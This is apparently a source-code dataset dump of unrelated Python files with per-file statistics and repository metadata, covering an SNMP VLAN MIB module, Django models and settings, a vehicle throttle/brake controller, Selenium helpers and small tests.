a3ComVlanProtocolIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanProtocolIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolIfIndex.setDescription("The first index of this row and the vlan's ifIndex in the ifTable. The value of this object is the same as the corresponding a3ComVlanIfIndex in the a3ComVlanTable.")
a3ComVlanProtocolIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 2), A3ComVlanLayer3Type())
if mibBuilder.loadTexts: a3ComVlanProtocolIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolIndex.setDescription('The second index of this row, which identifies one of possibly many protocols associated with the VLAN interface identified by the first index of this entry. The values are based on the layer 3 protocols specified in A3ComVlanType.')
a3ComVlanProtocolStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 3), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanProtocolStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolStatus.setDescription('The status column for this VLAN interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptable to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the creation request. Setting this object to createAndWait(5) causes a row in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptable to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). Row creation in this table is only possible when a corresponding VLAN entry has been created in the a3ComVlanTable with an a3ComVlanType set to vlanLayeredProtocols(16). Setting this object to destroy(6) will remove the corresponding VLAN interface to protocol mapping.')
class A3ComVlanEncapsType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("vlanEncaps3ComProprietaryVLT", 1), ("vlanEncaps8021q", 2), ("vlanEncapsPre8021qONcore", 3))
a3ComVlanEncapsIfTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1), )
if mibBuilder.loadTexts: a3ComVlanEncapsIfTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfTable.setDescription('This table lists VLAN encapsulation interfaces that exist within a device. A single entry exists in this list for each VLAN encapsulation interface in the system. A VLAN encapsulation interface may be created or destroyed.')
a3ComVlanEncapsIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanEncapsIfIndex"))
if mibBuilder.loadTexts: a3ComVlanEncapsIfEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfEntry.setDescription('An individual VLAN encapsulation interface entry. When an NMS wishes to create a new entry in this table, it must obtain a non-zero index from the a3ComNextAvailableVirtIfIndex object. Row creation in this table will fail if the chosen index value does not match the current value returned from the a3ComNextAvailableVirtIfIndex object.')
a3ComVlanEncapsIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanEncapsIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfIndex.setDescription("The index value of this row and the encapsulation interface's ifIndex in the ifTable. The NMS obtains the index value used for creating a row in this table by reading the a3ComNextAvailableVirtIfIndex object.")
a3ComVlanEncapsIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 2), A3ComVlanEncapsType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfType.setDescription('The encapsulation algorithm used when encapsulating packets transmitted, or de-encapsulating packets received through this interface.')
a3ComVlanEncapsIfTag = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfTag.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfTag.setDescription('The tag used when encapsulating packets transmitted, or de-encapsulating packets received through this interface.')
a3ComVlanEncapsIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 4), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfStatus.setDescription('The row status for this VLAN encapsulation interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notReady(3). In order for a row to become active, the NMS must set a3ComVlanEncapsIfTagType and a3ComVlanEncapsIfTag to some valid and consistent values. Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row, the agent will create the row and change the status to active(1). If any of the necessary objects are not available, or specify an invalid configuration, the row will not be created and the agent will return an appropriate error. Setting this object to createAndWait(5) causes a row in this table to be created. If all necessary objects in the row have been assigned values and specify a valid configuration, the status of the row will be set to notInService(2); otherwise, the status will be set to notReady(3). This object may only be set to createAndGo(4) or createAndWait(5) if it does not exist. Setting this object to active(1) when the status is notInService(2) causes the agent to commit the row. Setting this object to active(1) when its value is already active(1) is a no-op. Setting this object to destroy(6) will remove the corresponding VLAN encapsulation interface, remove the entry in this table, and remove the corresponding entry in the ifTable. In order for a set of this object to destroy(6) to succeed, all dependencies on this row must have been removed. These will include any references to this interface in the ifStackTable.')
a3ComNextAvailableVirtIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 3, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComNextAvailableVirtIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComNextAvailableVirtIfIndex.setDescription("The value of the next available virtual ifIndex. This object is used by an NMS to select an index value for row-creation in tables indexed by ifIndex. The current value of this object is changed to a new value when the current value is written to an agent's table that is indexed by ifIndex. Row creation using the current value of this object allocates a virtual ifIndex. Note the following: 1. A newly created row does not have to be active(1) for the agent to allocate the virtual ifIndex. 2. Race conditions between multiple NMSs end when a row is created. Rows are deemed created when a setRequest is successfully committed (i.e. the errorStatus is noError(0)). 3. An agent that exhausts its supply of virtual ifIndex values returns zero as the value of this object. This can be used by an NMS as an indication to delete unused rows and reboot the device.")
mibBuilder.exportSymbols("GENERIC-3COM-VLAN-MIB-1-0-7", a3ComVlanEncapsIfStatus=a3ComVlanEncapsIfStatus, a3ComEncapsulationGroup=a3ComEncapsulationGroup, A3ComVlanLayer3Type=A3ComVlanLayer3Type, a3ComVlanIfTable=a3ComVlanIfTable, generic=generic, a3ComIpVlanTable=a3ComIpVlanTable, a3ComVlanIfModeType=a3ComVlanIfModeType, a3ComVlanProtocolTable=a3ComVlanProtocolTable, a3ComVirtualGroup=a3ComVirtualGroup, A3ComVlanType=A3ComVlanType, a3ComIpVlanIpNetMask=a3ComIpVlanIpNetMask, a3ComVlanGlobalMappingTable=a3ComVlanGlobalMappingTable, a3ComVlanEncapsIfIndex=a3ComVlanEncapsIfIndex, a3ComIpVlanIpNetAddress=a3ComIpVlanIpNetAddress, a3ComVlanProtocolIndex=a3ComVlanProtocolIndex, a3ComVlanGlobalMappingEntry=a3ComVlanGlobalMappingEntry, a3ComVlanEncapsIfTag=a3ComVlanEncapsIfTag, a3ComVlanIfIndex=a3ComVlanIfIndex, a3ComNextAvailableVirtIfIndex=a3ComNextAvailableVirtIfIndex, a3ComVlanIfDescr=a3ComVlanIfDescr, a3ComVlanIfStatus=a3ComVlanIfStatus, a3ComVlanGlobalMappingIfIndex=a3ComVlanGlobalMappingIfIndex, a3ComVlanEncapsIfEntry=a3ComVlanEncapsIfEntry, a3ComVlanEncapsIfTable=a3ComVlanEncapsIfTable, a3ComVlanIfGlobalIdentifier=a3ComVlanIfGlobalIdentifier, a3ComVlanIfInfo=a3ComVlanIfInfo, a3ComVlanProtocolIfIndex=a3ComVlanProtocolIfIndex, genVirtual=genVirtual, RowStatus=RowStatus, a3ComIpVlanEntry=a3ComIpVlanEntry, a3ComVlanIfEntry=a3ComVlanIfEntry, a3ComVlanProtocolEntry=a3ComVlanProtocolEntry, A3ComVlanModeType=A3ComVlanModeType, a3ComIpVlanStatus=a3ComIpVlanStatus, a3Com=a3Com, a3ComVlanGroup=a3ComVlanGroup, a3ComVlanEncapsIfType=a3ComVlanEncapsIfType, a3ComVlanProtocolStatus=a3ComVlanProtocolStatus, a3ComVlanIfType=a3ComVlanIfType, a3ComVlanProtocolsGroup=a3ComVlanProtocolsGroup, A3ComVlanEncapsType=A3ComVlanEncapsType, a3ComVlanGlobalMappingIdentifier=a3ComVlanGlobalMappingIdentifier, genExperimental=genExperimental)
| 200.691729
| 1,838
| 0.790536
| 2,019
| 0.075641
| 0
| 0
| 0
| 0
| 0
| 0
| 15,453
| 0.578938
|
775ee35015e7fb1a1d56468e759eea466f2753f3
| 388
|
py
|
Python
|
uberlearner/main/api/authentication.py
|
Uberlearner/uberlearner
|
421391c3c838bf8f88eed47646226fe8dc22d061
|
[
"MIT"
] | 1
|
2020-10-17T04:41:47.000Z
|
2020-10-17T04:41:47.000Z
|
uberlearner/main/api/authentication.py
|
Uberlearner/uberlearner
|
421391c3c838bf8f88eed47646226fe8dc22d061
|
[
"MIT"
] | null | null | null |
uberlearner/main/api/authentication.py
|
Uberlearner/uberlearner
|
421391c3c838bf8f88eed47646226fe8dc22d061
|
[
"MIT"
] | null | null | null |
from tastypie.authentication import SessionAuthentication
class UberAuthentication(SessionAuthentication):
"""
Handles authentication for the course resources.
"""
def is_authenticated(self, request, **kwargs):
if request.method == 'GET':
return True
else:
return super(UberAuthentication, self).is_authenticated(request, **kwargs)
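# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# A tastypie resource opts into this behaviour through its Meta class; the resource name
# below is hypothetical.
from tastypie.resources import Resource
class ExampleReadOnlyFriendlyResource(Resource):
    class Meta:
        authentication = UberAuthentication()  # GET stays public, other verbs need a session
# --- end of illustrative sketch ---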
| 35.272727
| 86
| 0.693299
| 329
| 0.847938
| 0
| 0
| 0
| 0
| 0
| 0
| 69
| 0.177835
|
91f204cefc1e11f78d143865718a0720e6b49302
| 135
|
py
|
Python
|
libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py
|
akshitpradhan/TomHack
|
837226e7b38de1140c19bc2d478eeb9e379ed1fd
|
[
"MIT"
] | 22
|
2017-07-14T20:01:17.000Z
|
2022-03-08T14:22:39.000Z
|
libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py
|
akshitpradhan/TomHack
|
837226e7b38de1140c19bc2d478eeb9e379ed1fd
|
[
"MIT"
] | 6
|
2017-07-14T21:03:50.000Z
|
2021-06-10T19:08:32.000Z
|
libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py
|
akshitpradhan/TomHack
|
837226e7b38de1140c19bc2d478eeb9e379ed1fd
|
[
"MIT"
] | 13
|
2017-07-14T20:13:14.000Z
|
2020-11-12T08:06:05.000Z
|
from .layer_send import AxolotlSendLayer
from .layer_control import AxolotlControlLayer
from .layer_receive import AxolotlReceivelayer
| 33.75
| 46
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
91f2badbe46ccc2afa070e8ea0d95aa258e9f159
| 3,199
|
py
|
Python
|
accounts/models.py
|
MrEscape54/CRM
|
36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3
|
[
"MIT"
] | null | null | null |
accounts/models.py
|
MrEscape54/CRM
|
36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3
|
[
"MIT"
] | null | null | null |
accounts/models.py
|
MrEscape54/CRM
|
36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.urls import reverse
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.core.validators import RegexValidator
from core import utils
from core.models import User
from contacts.models import Contact
class ActiveParentManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class ParentAccount(models.Model):
name = models.CharField(pgettext_lazy("Name of Account", "Name"), max_length=64, unique=True, help_text='Required')
category = models.CharField(_("Category"), max_length=10, choices=utils.ACC_CATEGORY, help_text='Required',)
slug = models.SlugField(unique=True)
is_active = models.BooleanField(_("Is Active"), default=True)
created_by = models.ForeignKey(User, related_name="parent_created_by", on_delete=models.PROTECT)
created = models.DateTimeField(_("Created"), auto_now_add=True)
updated = models.DateTimeField(_("Updated"), auto_now=True)
def __str__(self):
return self.name
class Meta:
ordering = ["name"]
verbose_name = 'Parent Account'
verbose_name_plural = 'Parent Accounts'
objects = models.Manager() # The default manager.
active = ActiveParentManager() # Custom manager.
class ActiveAccountsManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class Account(models.Model):
name = models.CharField(pgettext_lazy("Name of Account", "Name"), max_length=64, unique=True, help_text='Required')
country = models.CharField(_("Country"), max_length=30, choices=utils.COUNTRIES, help_text='Required')
industry = models.CharField(_("Industry"), max_length=255, choices=utils.ACC_INDUSTRY, help_text='Required')
parent_account = models.ForeignKey(ParentAccount, related_name="account_parent_account", on_delete=models.PROTECT, help_text='Required')
slug = models.SlugField(unique=True)
status = models.CharField(_("Status"), max_length=15, choices=utils.ACC_STATUS, default="Prospect", help_text='Required')
address = models.CharField(_("Address"), max_length=255, blank=True, null=True)
website = models.URLField(_("Website"), blank=True, null=True)
description = models.TextField(blank=True, null=True)
is_active = models.BooleanField(_("Is Active"), default=True)
created_by = models.ForeignKey(User, related_name="account_created_by", on_delete=models.PROTECT)
created = models.DateTimeField(_("Created"), auto_now_add=True)
updated = models.DateTimeField(_("Updated"), auto_now=True)
contacts = models.ManyToManyField(Contact, related_name="account_contacts", blank=True)
assigned_to = models.ForeignKey(User, related_name="account_assigned_user", on_delete=models.PROTECT)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse("accounts:detail", args=[self.slug])
class Meta:
ordering = ["status"]
verbose_name = 'Account'
objects = models.Manager() # The default manager.
active = ActiveAccountsManager() # Custom manager.
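# --- Illustrative sketch (added for clarity; not part of the original app) ---
# The paired managers above let call sites skip soft-deleted rows without repeating the
# is_active filter; the helper name below is hypothetical.
def active_accounts_assigned_to(user):
    """Return only is_active accounts for a user (Account.objects would also include inactive rows)."""
    return Account.active.filter(assigned_to=user)
# --- end of illustrative sketch ---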
| 42.092105
| 140
| 0.736168
| 2,879
| 0.899969
| 0
| 0
| 0
| 0
| 0
| 0
| 494
| 0.154423
|
91f3e934e2bf21d69c8e84878b0f0bb1bc0e52af
| 104
|
py
|
Python
|
Courses/HSEPython/8 week/5.py
|
searayeah/sublime-snippets
|
deff53a06948691cd5e5d7dcfa85515ddd8fab0b
|
[
"MIT"
] | null | null | null |
Courses/HSEPython/8 week/5.py
|
searayeah/sublime-snippets
|
deff53a06948691cd5e5d7dcfa85515ddd8fab0b
|
[
"MIT"
] | null | null | null |
Courses/HSEPython/8 week/5.py
|
searayeah/sublime-snippets
|
deff53a06948691cd5e5d7dcfa85515ddd8fab0b
|
[
"MIT"
] | null | null | null |
from functools import reduce
print(reduce(lambda x, y: x * (y**5), list(map(int, input().split())), 1))
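# Worked example (added for clarity): starting from the initial value 1, each input number y
# multiplies the accumulator by y**5, so the script prints the product of fifth powers.
# For the input "1 2 3" it prints 1 * 1**5 * 2**5 * 3**5 = 7776.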
| 34.666667
| 74
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
91f411263bdba1a973d2748f05c7f918cdbad645
| 1,176
|
py
|
Python
|
ros/src/twist_controller/twist_controller.py
|
SunshengGu/CarND-capstone-team-roboturtles
|
6ceb896f5af095223910a8366b0747a4c0bba910
|
[
"MIT"
] | null | null | null |
ros/src/twist_controller/twist_controller.py
|
SunshengGu/CarND-capstone-team-roboturtles
|
6ceb896f5af095223910a8366b0747a4c0bba910
|
[
"MIT"
] | null | null | null |
ros/src/twist_controller/twist_controller.py
|
SunshengGu/CarND-capstone-team-roboturtles
|
6ceb896f5af095223910a8366b0747a4c0bba910
|
[
"MIT"
] | 2
|
2019-02-05T02:55:57.000Z
|
2019-02-10T20:12:41.000Z
|
from yaw_controller import YawController
from pid import PID
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class Controller(object):
def __init__(self, wheel_base, steer_ratio,max_lat_accel,max_steer_angle, accel_limit,decel_limit):
self.yaw = YawController(wheel_base, steer_ratio, 0., max_lat_accel, max_steer_angle)
self.steer = 0.0
self.throttle = 0.0
self.brake = 0.0
self.kp = 0.9
self.ki = 0.01
self.kd = 0.4
self.mn = decel_limit
self.mx = 0.5
self.pid = PID(self.kp,self.ki,self.kd ,self.mn,self.mx)
self.accel =None
def control(self,lin_vel,ang_vel,curr_vel,sample_time,vehicle_mass, wheel_radius,dbw):
self.steer = self.yaw.get_steering(lin_vel,ang_vel,curr_vel)
error = lin_vel- curr_vel
if lin_vel == 0 and curr_vel ==0:
self.throttle = 0
self.brake = 700 #prevent rolling forward
if dbw:
accel_target =self.pid.step(error,sample_time )
if accel_target >=0 :
self.throttle = accel_target
self.brake = 0.0
else:
self.throttle = 0.0
self.brake = -accel_target*vehicle_mass*wheel_radius
return self.throttle, self.brake, self.steer
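# --- Illustrative smoke test (added for clarity; not part of the original node) ---
# The numbers below are placeholders, not values taken from the project.
if __name__ == '__main__':
    controller = Controller(wheel_base=2.85, steer_ratio=14.8, max_lat_accel=3.0,
                            max_steer_angle=8.0, accel_limit=1.0, decel_limit=-5.0)
    print(controller.control(lin_vel=11.1, ang_vel=0.2, curr_vel=10.0, sample_time=0.02,
                             vehicle_mass=1736.35, wheel_radius=0.2413, dbw=True))
# --- end of illustrative sketch ---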
| 25.021277
| 104
| 0.681973
| 1,071
| 0.910714
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.021259
|
91f45538afa3b794621cc7c469da195bbca2956a
| 627
|
py
|
Python
|
samples/cordic/cordic_golden.py
|
hj424/heterocl
|
e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b
|
[
"Apache-2.0"
] | 236
|
2019-05-19T01:48:11.000Z
|
2022-03-31T09:03:54.000Z
|
samples/cordic/cordic_golden.py
|
hj424/heterocl
|
e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b
|
[
"Apache-2.0"
] | 248
|
2019-05-17T19:18:36.000Z
|
2022-03-30T21:25:47.000Z
|
samples/cordic/cordic_golden.py
|
hj424/heterocl
|
e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b
|
[
"Apache-2.0"
] | 85
|
2019-05-17T20:09:27.000Z
|
2022-02-28T20:19:00.000Z
|
import numpy as np
golden = np.array([
[100.0, 100.0],
[206.226840616, 179.610387213],
[1190.25124092, 1197.15702025],
[1250.76639667, 1250.3933971],
[1261.76760093, 1250.17718583],
[1237.4846285, 1237.56490579],
[1273.56730356, 1266.82141705],
[1272.899992, 1259.92589118],
[1.17000308922e-06, 1.21115462165e-06],
[4.69048419035e-08, 5.61093645301e-08],
[1.50244060584e-09, 2.44292250731e-09],
[8.47391624349e-11, 1.15593790738e-10],
[5.10649970307e-12, 4.80114236959e-12],
[8.34326950279e-13, 4.1368839091e-13],
[3.66142109259e-14, 4.95319932219e-14],
[8.20801944862e-15, 4.94154683061e-14]])
| 31.35
| 41
| 0.700159
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
91f4996456aabf6bbe1ac697a26d604a9883879d
| 98
|
py
|
Python
|
src/game_client/conf.py
|
adapiekarska/network-pong
|
c6a88b66570f26aea9c9976eb16953c480b846ec
|
[
"MIT"
] | 2
|
2018-11-14T17:25:24.000Z
|
2019-12-09T17:57:30.000Z
|
src/game_client/conf.py
|
adapiekarska/network-pong
|
c6a88b66570f26aea9c9976eb16953c480b846ec
|
[
"MIT"
] | null | null | null |
src/game_client/conf.py
|
adapiekarska/network-pong
|
c6a88b66570f26aea9c9976eb16953c480b846ec
|
[
"MIT"
] | null | null | null |
"""
User configuration file for the client.
"""
SERVER_ADDRESS = "127.0.0.1"
SERVER_PORT = 50000
| 14
| 39
| 0.704082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 58
| 0.591837
|
91f534930f8a5265738ba0e1d6c22b1ba0b55ac6
| 3,479
|
py
|
Python
|
build/lib/Element/Element.py
|
sunnyyukaige/APP_automation_core
|
b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4
|
[
"MIT"
] | null | null | null |
build/lib/Element/Element.py
|
sunnyyukaige/APP_automation_core
|
b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4
|
[
"MIT"
] | null | null | null |
build/lib/Element/Element.py
|
sunnyyukaige/APP_automation_core
|
b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4
|
[
"MIT"
] | null | null | null |
from selenium.common.exceptions import WebDriverException, NoSuchElementException
from Element.Waitor import Waitor
from Element.Find import Find
from Utilitys.WaitUtils import WaitUtils
class Element(Find):
def __init__(self, driver):
Find.__init__(self)
self.driver = driver
self.interval = 0.5
self.timeout = 20
def wait_for(self):
return Waitor(self, self.interval, self.timeout)
def get_interval(self):
return self.interval
def get_timeout(self):
return self.timeout
def set_interval(self, interval):
self.interval = interval
def set_timeout(self, timeout):
self.timeout = timeout
def find_element_click(self, by, value):
try:
self.driver.find_element(by, value).click()
except Exception as handleRetry:
try:
WaitUtils.wait_for_element_clickable(self.driver, by, value)
self.driver.find_element(by, value).click()
except Exception as e:
raise e
def find_element_sendkeys(self, by, value, keys):
try:
self.driver.find_element(by, value).send_keys(keys)
except Exception as handleRetry:
try:
WaitUtils.wait_for_element_visible(self.driver, by, value)
self.driver.find_element(by, value).send_keys(keys)
except Exception as e:
raise e
def find_element_set_value(self, by, value, keys):
try:
self.driver.find_element(by, value).set_value(keys)
except Exception as handleRetry:
try:
WaitUtils.wait_for_element_visible(self.driver, by, value)
self.driver.find_element(by, value).set_value(keys)
except Exception as e:
raise e
def drag_and_drop(self, origin_el, destination_el):
pass
    def element_exist(self, by, value):
        try:
            self.driver.find_element(by, value)
            return True
        except Exception as handleRetry:
            try:
                WaitUtils.wait_for_element_present(self.driver, by, value)
                self.driver.find_element(by, value)
                return True  # element found after waiting
            except Exception as e:
                raise e
    def visible(self, by, value):
        try:
            # self.driver is a WebDriver instance, not a callable
            return self.driver.find_element(by, value).is_displayed()
        except Exception as handleRetry:
            try:
                self._refresh()
                return self.driver.find_element(by, value).is_displayed()
            except Exception as e:
                return False
    def clear(self, by, value):
        try:
            self.driver.find_element(by, value).clear()
        except Exception as handleRetry:
            try:
                self.wait_for().visible()
                self.driver.find_element(by, value).clear()
            except Exception as e:
                raise NoSuchElementException
def find_elements(self, by, value, number=1):
try:
if len(self.driver.find_elements(by, value)) >= number:
return self.driver.find_elements(by, value)
else:
raise Exception
except Exception as handleRetry:
self._refresh()
WaitUtils.wait_for_elements_number_right(self.driver, by, value, number)
return self.driver.find_elements(by, value)
# TODO: We need to wrap more method here.
| 32.514019
| 84
| 0.596148
| 3,289
| 0.945387
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.011785
|
91f55da34b50862c7008aa6fdd44283def33131b
| 2,047
|
py
|
Python
|
config/settings/prd.py
|
zhenghuihu/django-skeleton
|
548019b2f5826593f2f270c96f8b14ec19280c51
|
[
"MIT"
] | null | null | null |
config/settings/prd.py
|
zhenghuihu/django-skeleton
|
548019b2f5826593f2f270c96f8b14ec19280c51
|
[
"MIT"
] | null | null | null |
config/settings/prd.py
|
zhenghuihu/django-skeleton
|
548019b2f5826593f2f270c96f8b14ec19280c51
|
[
"MIT"
] | null | null | null |
'''
production setting
'''
# include all base settings
from .base import * # pylint: disable=W0401,W0614
# include credentials (not included in repo)
from . import credentials as crd # pylint: disable=W0401,W0611
# disable debugging
DEBUG = False
# ========================
# SECRET_KEY
# https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-SECRET_KEY
# ========================
SECRET_KEY = crd.SECRET_KEY
# ========================
# STATIC_ROOT
# Collect static files here
# https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-STATIC_ROOT
# ========================
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'run', 'static')
# ========================
# Database override
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# ========================
#DATABASES = {
# 'default': {
# }
#}
# ========================
# logging configuration
# https://docs.djangoproject.com/en/1.10/topics/logging/
# ========================
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)-8s %(asctime)s %(module)-10s %(message)s',
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
},
'handlers': {
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'file': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.join(PROJECT_ROOT, 'run', 'django.log'),
'maxBytes': 10*1000*1000, # 10M
'backupCount': 3,
'formatter': 'verbose',
},
},
'loggers': {
'': {
'handlers': ['file'],
'propagate': True,
'level': 'INFO',
},
'django': {
'handlers': ['file',],
'propagate': True,
'level': 'INFO',
},
},
}
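# Illustrative note (added for clarity; not part of the original settings): with the LOGGING
# configuration above, module-level loggers propagate to the rotating file handler, e.g.
#   import logging
#   logging.getLogger(__name__).info("lands in run/django.log at INFO and above")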
| 25.911392
| 78
| 0.484123
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,296
| 0.633122
|
91f69a518f7a745cba0d44a46ab85227b8ebc8dd
| 636
|
py
|
Python
|
8. str_range/test_solution.py
|
dcragusa/WeeklyPythonExerciseB2
|
a7da3830e27891060dcfb0804c81f52b1f250ce8
|
[
"MIT"
] | null | null | null |
8. str_range/test_solution.py
|
dcragusa/WeeklyPythonExerciseB2
|
a7da3830e27891060dcfb0804c81f52b1f250ce8
|
[
"MIT"
] | null | null | null |
8. str_range/test_solution.py
|
dcragusa/WeeklyPythonExerciseB2
|
a7da3830e27891060dcfb0804c81f52b1f250ce8
|
[
"MIT"
] | null | null | null |
from solution import str_range
def test_same_start_end():
r = str_range('a', 'a')
assert iter(r) == r
assert ''.join(list(r)) == 'a'
def test_simple():
r = str_range('a', 'c')
assert ''.join(list(r)) == 'abc'
def test_simple_with_step():
r = str_range('a', 'c', 2)
assert ''.join(list(r)) == 'ac'
def test_simple_with_negativestep():
r = str_range('c', 'a', -2)
assert ''.join(list(r)) == 'ca'
def test_hebrew():
r = str_range('א', 'ז', 2)
assert ''.join(list(r)) == 'אגהז'
test_same_start_end()
test_simple()
test_simple_with_step()
test_simple_with_negativestep()
test_hebrew()
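# --- Minimal sketch (added for clarity): one possible str_range that satisfies the tests
# above; the real solution.py is not shown here, so this is an assumption. ---
def _str_range_sketch(start, end, step=1):
    stop = ord(end) + (1 if step > 0 else -1)
    return (chr(code) for code in range(ord(start), stop, step))
# --- end of illustrative sketch ---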
| 18.171429
| 37
| 0.606918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 68
| 0.105919
|
91f6f8ff0e9840449fba337706ce6b583a980630
| 8,227
|
py
|
Python
|
acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py
|
wangji1/test-framework-and-suites-for-android
|
59564f826f205fe7fab64f45b88b1a6dde6900af
|
[
"Apache-2.0"
] | 8
|
2018-09-14T01:34:01.000Z
|
2021-07-01T02:00:23.000Z
|
acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py
|
wangji1/test-framework-and-suites-for-android
|
59564f826f205fe7fab64f45b88b1a6dde6900af
|
[
"Apache-2.0"
] | 3
|
2019-09-10T11:39:50.000Z
|
2019-10-10T08:26:22.000Z
|
acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py
|
wangji1/test-framework-and-suites-for-android
|
59564f826f205fe7fab64f45b88b1a6dde6900af
|
[
"Apache-2.0"
] | 9
|
2018-10-11T15:14:03.000Z
|
2021-02-17T11:37:20.000Z
|
'''
Copyright (C) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
SPDX-License-Identifier: Apache-2.0
'''
import re
import math
import time
from testlib.util.common import g_common_obj
from testlib.graphics.common import window_info
class DisplayMetricsReportImpl(object):
""" DisplayMetricsReportImpl """
DUMPSYS_CMD = "dumpsys display|grep DisplayDeviceInfo"
GET_SIZE = "wm size"
GET_DENSITY = "wm density"
density_range = [120, 160, 213, 240, 280, 320, 360, 400, 420, 480, 560, 640]
flag = False
def __init__(self):
self.device = g_common_obj.get_device()
def __get_dumpsys_size(self):
"""
run commands 'adb shell dumpsys | grep DisplayDeviceInfo' to get dumpsys size,such as 1280 x 800
"""
msg = g_common_obj.adb_cmd_capture_msg(repr(self.DUMPSYS_CMD))
m = re.search(r'\d+\s*x\s*\d+', msg)
dumpsys_size = m.group()
return dumpsys_size
def get_dumpsys_hight(self):
dumpsys_size = self.__get_dumpsys_size()
size_list = dumpsys_size.split(" ")
if len(size_list) > 0:
